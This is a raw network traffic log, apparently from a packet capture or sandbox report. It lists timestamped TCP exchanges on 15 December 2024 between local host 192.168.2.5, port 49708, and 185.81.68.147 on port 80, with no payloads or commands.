                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.444183111 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.445183992 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.445286036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.445848942 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.446352959 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.446387053 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.446485996 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.447561979 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.447594881 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.447690964 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.451162100 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.451194048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.451229095 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.451261997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.451308966 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.451345921 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.451345921 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.451380968 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.451488018 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.453099966 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.453134060 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.453224897 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.454252958 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.454293013 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.454408884 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.455125093 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.455157995 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.455250025 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.456187963 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.456540108 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.456639051 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.457389116 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.457597017 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.458688974 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.458805084 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.458883047 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.458914042 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.459763050 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.460196972 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.460335016 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.460905075 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.461090088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.462150097 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.462249994 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.462321997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.462450981 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.463260889 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.463388920 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.463515043 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.464462042 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.464688063 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.465540886 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.465630054 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.465884924 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.466017962 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.466664076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.466993093 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.467890024 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.467993021 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.468074083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.468205929 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.468991041 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.469115019 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.469250917 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.470165968 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.470635891 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.471404076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.471512079 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.471601009 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.471734047 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.472647905 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.472681046 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.472790956 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.473735094 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.473908901 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.474020958 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.474957943 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.474992037 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.475106955 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.476232052 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.476267099 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.476667881 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.477268934 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.477303028 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.478312969 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.478411913 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.478503942 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.478610039 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.479530096 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.479701996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.480720043 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.480824947 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.480997086 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.481097937 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.481970072 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.482002974 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.482111931 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.483099937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.483231068 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.484271049 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.484366894 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.615073919 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.615201950 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.615385056 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.615560055 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.615612030 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.616647005 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.616749048 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.616775036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.616820097 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.617739916 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.617834091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.618618965 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.618916988 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.619019032 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.620131969 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.620215893 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.620235920 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.620269060 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.621216059 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.621285915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.622370958 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.622479916 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.622498989 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.622543097 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.623522997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.623675108 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.623780012 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.624711990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.624846935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.625847101 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.625940084 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.626024961 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.626122952 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.627047062 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.627218008 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.627336979 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.628156900 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.628349066 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.629350901 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.629452944 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.629508018 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.629550934 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.630480051 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.630661964 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.631660938 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.631757975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.631757021 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.631802082 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.632807016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.632917881 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.633965969 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.634058952 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.634107113 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.634210110 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.635126114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.635288954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.635390043 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.636312962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.636495113 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.637480974 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.637551069 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.637586117 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.637614965 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.638602972 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.638720989 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.638818026 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.639789104 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.639919043 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.640957117 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.641047001 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.641068935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.641113997 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.642102003 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.642209053 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.642611027 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.643263102 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.643378019 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.644449949 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.644543886 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.644572020 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.644634008 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.645595074 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.645708084 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.646636963 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.646750927 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.646889925 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.647952080 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.648082972 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.648088932 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.648133039 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.649055004 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.649240017 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.650353909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.650376081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.650460958 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.650496960 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.651397943 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.651520014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.651650906 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.652576923 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.652688980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.653731108 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.653831005 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.653840065 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.653878927 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.654896975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.655005932 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.655134916 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.656074047 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.656205893 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.657283068 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.657386065 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.657407999 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.657447100 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.658440113 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.658562899 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.659567118 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.659663916 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.659732103 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.659848928 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.660808086 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.660825014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.660947084 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.662545919 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.662643909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.662774086 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.663022995 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.663131952 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.664175034 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.664272070 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.664329052 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.664474010 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.665342093 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.665514946 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.666487932 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.666588068 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.666603088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.666642904 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.667670012 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.667784929 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.669044971 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.669081926 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.669168949 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.669203043 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.669975996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.670085907 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.670213938 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.671175957 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.671269894 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.671387911 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.672297955 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.672426939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.673507929 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.673602104 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.673656940 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.673768997 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.674634933 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.674740076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.674869061 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.675892115 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.723778963 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.807370901 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.807478905 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.807642937 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.807876110 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.808029890 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.809048891 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.809129000 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.809199095 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.809295893 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.810223103 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.810317039 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.811352968 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.811436892 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.811446905 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.811501026 CET4970880192.168.2.5185.81.68.147
